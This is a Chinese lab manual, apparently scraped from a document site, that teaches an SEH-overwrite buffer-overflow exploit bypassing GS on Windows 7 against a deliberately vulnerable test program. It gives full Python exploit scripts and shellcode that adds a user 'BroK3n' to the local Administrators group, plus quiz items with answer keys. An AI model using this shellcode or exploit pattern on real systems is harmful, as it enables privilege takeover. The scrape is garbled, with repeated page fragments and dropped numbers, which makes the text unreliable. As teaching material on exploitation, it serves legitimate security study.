实验指导书

Size: px

Start display at page:

Download "实验指导书"

乔群史
5 years ago
Views:

1 从零开始学习软件漏洞挖掘系列教程第三篇 : 利用 SEH 机制 Exploit it 1 实验简介实验所属系列 : 系统安全实验对象 : 本科 / 专科网络 / 信息安全专业相关课程及专业 : 计算机网络, 信息安全实验时数 ( 学分 ):2 学时实验类别 : 实践实验类 2 实验目的在传统的缓冲区溢出中, 我们可以通过覆盖返回地址以跳转到 shellcode 但并不是所有的溢出都是那么简单的比如当程序有 GS 保护的情况下, 我们不能直接覆盖返回地址今天, 我们将看到另一种使用异常处理机制的漏洞利用技术该技术可以绕过 GS 的保护通过该实验我们了解覆盖 SEH 绕过 GS 的漏洞利用技术 3 预备知识 1. 关于程序异常处理的一些基础知识什么是异常处理例程? 一个异常处理例程是内嵌在程序中的一段代码, 用来处理在程序中抛出的异常一个典型的异常处理例程如下所示 : try { //run stuff. If an exception occurs, go to code } catch { // run stuff when exception occurs } Windows 中有一个默认的 SEH( 结构化异常处理例程 ) 捕捉异常如果 Windows 捕捉到了一个异常, 你会看到 XXX 遇到问题需要关闭的弹窗这通常是默认异常处理的结果很明显, 为了编写健壮的软件, 开发人员应该要用开发语言指定异常处理例程, 并且把 Windows 的默认 SEH 作为最终的异常处理手段当使用语言式的异常处理 ( 如 :try...catch), 必须要按照底层的操作系统生成异常处理例程代码的链接和调用 ( 如果没有一个异常处理例程被调用或有效的异常处理例程无法处理异常, 那么 Windows SEH

将被使用 (UnhandledExceptionFilter)) 所以当执行一个错误或非法指令时, 程序将有机会来处理这个异常和做些什么如果没指定异常处理例程的话, 那么操作系统将接管异常和弹窗, 并询问是否要把错误报告发送给 MS 异常处理包括两个结构 Pointer to next SHE record 指向下一个异常处理 Pointer to Exception Handler

2 将被使用 (UnhandledExceptionFilter)) 所以当执行一个错误或非法指令时, 程序将有机会来处理这个异常和做些什么如果没指定异常处理例程的话, 那么操作系统将接管异常和弹窗, 并询问是否要把错误报告发送给 MS 异常处理包括两个结构 Pointer to next SHE record 指向下一个异常处理 Pointer to Exception Handler 指向异常处理函数 4 实验环境服务器 :Windows 7 SP1,IP 地址 : 随机分配辅助工具 :Windbg,ImmunityDebugger,python2.7,mona.py Windbg 是在 windows 平台下, 强大的用户态和内核态调试工具 Immunity Debugger 软件专门用于加速漏洞利用程序的开发, 辅助漏洞挖掘以及恶意软件分析 python 是一种面向对象解释型计算机程序设计语言 mona.py 是由 corelan team 整合的一个可以自动构造 Rop Chain 而且集成了 metasploit 计算偏移量功能的强大挖洞辅助插件注本实验成功与否与实验环境, 工具等相关 5 实验步骤首先我们对目标程序进行尝试溢出, 看看是否能够覆盖到 SEH, 然后计算多少个字符可以覆盖到到 SEH, 寻找合适的 POP POP RETN 序列和 SHELLCODE 构造我们的 Exploit 我们的任务分为 3 个部分 : 1. 尝试溢出 2. 定位溢出点

3 3. 构造利用 5.1 实验任务一前言下面是我写的有漏洞程序的源码 //by #include<windows.h> #include<string.h> #include<stdio.h> void test(char *str) { char buf[8]; strcpy(buf,str); } int main() { FILE *fp; int i; char str[30000]; LoadLibrary("C:\\Netfairy.dll"); if((fp=fopen("c:\\test.txt","r"))==null) { printf("\nfile can not open!"); getchar(); exit(0); } for(i=0;;i++) { if(!feof(fp)) { str[i]=fgetc(fp);

4 } else { break; } } test(str); fclose(fp); getchar(); return 0; } 注本有漏洞的程序名为 test.exe, 在 C 盘下可以找到. 任务描述 : 使用恶意构造的文件溢出目标程序并计算溢出点当我们拿到一个软件, 正常情况下, 我们先试试能不能溢出利用它利用下面 python 代码试试 filename="c:\\test.txt"# 待写入的文件名 myfile=open(filename,'w') # 以写方式打开文件 filedata="a"*50000 # 待写入的数据 myfile.write(filedata) # 写入数据 myfile.close() # 关闭文件这里产生个 A, 运行这 python 代码, 在 C 盘下会产生 5000 个 A 组成的 test.txt 文件然后用 windbg 打开程序, 执行命令 g, 可以看到,windbg 捕获到了异常, 再用! exchain 查看 SEH 链

5 我们利用超长字符串成功覆盖了 SEH 接下来就是定位溢出点了, 也就是多少个字符可以覆盖到 SEH. 首先我们用 ImmunityDebugger 的 mona.py 插件产生个随机字符!mona pc 50000

6 然后把找到 patttern.txt 这个文件, 把选中的内容去掉网络精灵

mona pattern_offset 4Mn5 由上图可知我们可以知道 4Mn5 出现在 9764 位置, 所以理论上我们填充 9764 个字符就可以覆盖到 Pointer to next SHE record 了, 但是我最了一下测试发现 9764 个字符没有覆盖到 Pointer to next

7 改名为 test.txt 替换原 C 盘下的 test.txt 文件然后再次用 windbg 打开我们的 test.exe 程序, 输入命令 g 运行崩溃, 在输入!exchain 查看异常处理链, 如下图可以看到 Pointer to next SHE record 被覆盖为 0x356e4d34, 也就是字符串 5nM4 因为因为这是小序存放, 所以反过来就是 4Mn5 我们打开 ImmunityDebugger 在命令行输入!mona pattern_offset 4Mn5 由上图可知我们可以知道 4Mn5 出现在 9764 位置, 所以理论上我们填充 9764 个字符就可以覆盖到 Pointer to next SHE record 了, 但是我最了一下测试发现 9764 个字符没有覆盖到 Pointer to next SHE record 难道我们计算有错? 其实不是的, 我们刚才产生了个随机字符对吧? 我发现这个字符每隔就循环一次, 所以我们需要覆盖个字符才可以覆盖到 Pointer to next SEH record, 因此我们把前面的 python 代码改成下面这样 filename="c:\\test.txt"# 待写入的文件名 myfile=open(filename,'w') # 以写方式打开文件

8 filedata="a"*30044 # 待写入的数据 myfile.write(filedata) # 写入数据 myfile.close() # 关闭文件重新产生 test.txt 文件, 然后用 ImmunityDebugger 打开 test.exe 程序并运行, 程序出现异常, 此时看 0x18ff78 这个地址, 我们发现 AAAAAA 还差 20 个字符覆盖到 Pointer to next SHE record 因此我们把前面的 python 代码的这句 filedata="a"*30044 # 待写入的数据改成 filedata="a"*30064 # 待写入的数据再次用 ImmunityDebugger 运行 test.exe

可以看到刚好能覆盖到地址 0x18ff78, 也就是 Pointer to next SHE record ok, 定位完成注本实验与环境关系很大, 可能你做的跟我的不完全一样, 大家随机应变学会思路就行 5.1.1. 练习关于覆盖 SEH, 下列说法正确的是是?

9 可以看到刚好能覆盖到地址 0x18ff78, 也就是 Pointer to next SHE record ok, 定位完成注本实验与环境关系很大, 可能你做的跟我的不完全一样, 大家随机应变学会思路就行练习关于覆盖 SEH, 下列说法正确的是是? 单选题 A 我们可以覆盖 SHE 那么一定也可以覆盖返回地址并利用 B 覆盖 SEH 中我们只需要覆盖 Pointer to next SEH record C 如果程序没有写异常处理那么就不能利用 SEH

10 D 需要用 POP POP RETN 序列的地址覆盖 Pointer to Exception Handler 答案 :D 5.2 实验任务二任务描述 : 构造我们的利用代码 1 由前面可知我们填充个字符就可以覆盖到 Pointer to next SHE record seh 利用的格式是填充物 + "\xeb\x06\x90\x90" +pop pop retn 指令序列地址 +shellcode 我这里给出一个在 Windows 7 64 位 sp1 下可用的 shellcode // 添加用户 shellcode "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"\ "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"\ "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"\ "\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a"\ "\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf"\ "\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f"\ "\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69"\ "\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63"\ "\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"\ "\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33"\ "\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65"\ "\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63"\ "\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7"

$还差 pop pop retn 序列就行了, 其实我觉得最难的就是找 pop pop retn 序列, 如果在 xp 下倒不是什么问题,win7 以上微软加入了各种安全保护措施, 如 safeseh 这就是为什么前面程序代码中我加入了 LoadLibrary("C:\\Netfairy.$

11 还差 pop pop retn 序列就行了, 其实我觉得最难的就是找 pop pop retn 序列, 如果在 xp 下倒不是什么问题,win7 以上微软加入了各种安全保护措施, 如 safeseh 这就是为什么前面程序代码中我加入了 LoadLibrary("C:\\Netfairy.dll"); 因为系统的 dll 基本上都有 safeseh, 所以我们需要找到一个没有 safeseh 的模块, 它就是 Netfairy.dll, 并且这个模块有 pop pop retn 序列下面说下怎么在 Netfairy.dll 查找 pop pop retn 首先用 ImmunityDebugger 载入 test.exe 程序并运行, 出现异常后点工具栏的按 Atl+M 哈哈, 看到我们的 netfairy.dll 模块了吧, 然后

$filename="c:\\test.$ $txt"# 待写入的文件名 myfile=open(filename,'w') # 以写方式打开文件 filedata="a"*30044+"\xeb\x06\x90\x90"+"\x44\x13\x02\x50"+\$

13 看到了吧,0x 有我们想要的 pop pop retn 序列 E POP ESI B POP EBX C3 RETN 所以, 完整的 exploit 是这样 filename="c:\\test.txt"# 待写入的文件名 myfile=open(filename,'w') # 以写方式打开文件 filedata="a"*30044+"\xeb\x06\x90\x90"+"\x44\x13\x02\x50"+\ "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"\ "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"\ "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"\ "\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a"\

$"\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf"\ "\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f"\ "\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69"\$

14 "\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf"\ "\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f"\ "\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69"\ "\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63"\ "\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"\ "\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33"\ "\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65"\ "\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63"\ 据 "\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7" # 待写入的数 myfile.write(filedata) # 写入数据 myfile.close() # 关闭文件运行这段 python 代码, 然后用 ImmunityDebugger 打开 test.exe 程序并运行 Perfect!!! 我们看到了 Pointer to Exception Handler 成被覆盖为 , 还有我们的 shellcode 然而, 先高兴太早, 请你先仔细看

$但是我手头没有, 于是, 想到了跳转, 没错前面我们不是填充了 30064 个 A 吗? 那里有大把的空间啊, 我们为何不把 shellcode 放在那里? 我们可以在 Pointer to next SHE record 放一个往前跳的指令, 就可以跳到我们的 shellcode 了, 我附上我的 POC filename="c:\\test.$

15 我数了一下我的 shellcode 长度是是 194 个字节, 你再计算 Pointer to Exception Handler 后到最底下, 少于 194 字节对不? 那就说明我们的 shellcode 被截断了缓冲区太短了, 我们的 shellcode 放不下那怎么办, 换个短到合适的 shelocode? 但是我手头没有, 于是, 想到了跳转, 没错前面我们不是填充了个 A 吗? 那里有大把的空间啊, 我们为何不把 shellcode 放在那里? 我们可以在 Pointer to next SHE record 放一个往前跳的指令, 就可以跳到我们的 shellcode 了, 我附上我的 POC filename="c:\\test.txt"# 待写入的文件名 myfile=open(filename,'w') # 以写方式打开文件 filedata="a"*29770+"\x90"*100+"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\ x8b\x52\x1c\x8b\x42"\ "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"\ "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"\ "\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a"\ "\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf"\ "\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f"\ "\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69"\

$"\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63"\ "\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"\ "\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33"\$

16 "\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63"\ "\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"\ "\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33"\ "\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65"\ "\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63"\ "\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7"+\ "\xeb\x06\x90\x90"+"\x44\x13\x02\x50"\ "\xe9\x03\xff\xff\xff" #00 18FF80 E9 03FFFFFF JMP 0018FE88 myfile.write(filedata) # 写入数据 myfile.close() # 关闭文件先运行这段 python 代码, 然后运行目标程序, 打开 dos 窗口, 输入 net user 看看可见成功添加名为 BroK3n 的用户溢出成功, 执行了我们的 shellcode, 漏洞利用成功

17 练习以下说法不正确的是 : 单选题 A 如果 POP POP RETN 模块有 safeseh, 那么将不能利用成功 B 覆盖 Pointer to next SHE record 的 EB 是作为跳到 shellcode 的跳板 C shellcode 只能布置在 Pointer to Exception Handler 后面 D shellcode 不能出现 \00 和其他坏字符答案 :C 6 实验报告要求参考实验原理与相关介绍, 完成实验任务, 并对实验结果进行分析, 完成思考题目, 总结实验的心得体会, 并提出实验的改进意见 7 分析与思考 1) 很多时候我们会选着覆盖返回地址加以利用, 但是现在的操作系统引入了各种保护措施, 使得利用更加困难比如 GS 可以成功挫败很多基于覆盖返回地址的利用 2) 关于覆盖 SEH 微软也有相应的防护措施, 如 safeseh 但是其中也有绕过的办法, 在特定的情况下还是可以利用成功 8 参考网络精灵

实验指导书

实验指导书 1 实验简介从零开始学习软件漏洞挖掘系列教程第四篇 : 绕过 GS 机制实验所属系列 : 系统安全实验对象 : 本科 / 专科信息安全专业相关课程及专业 : 计算机网络实验时数 ( 学分 ):2 学时实验类别 : 实践实验类 2 实验目的通过该实验了解绕过 GS 机制的方法, 能够在开启程序 GS 编译的情况下成功利用 3 预备知识 1. 关于 GS 的一些基础知识针对缓冲区溢出覆盖函数返回地址这一特征,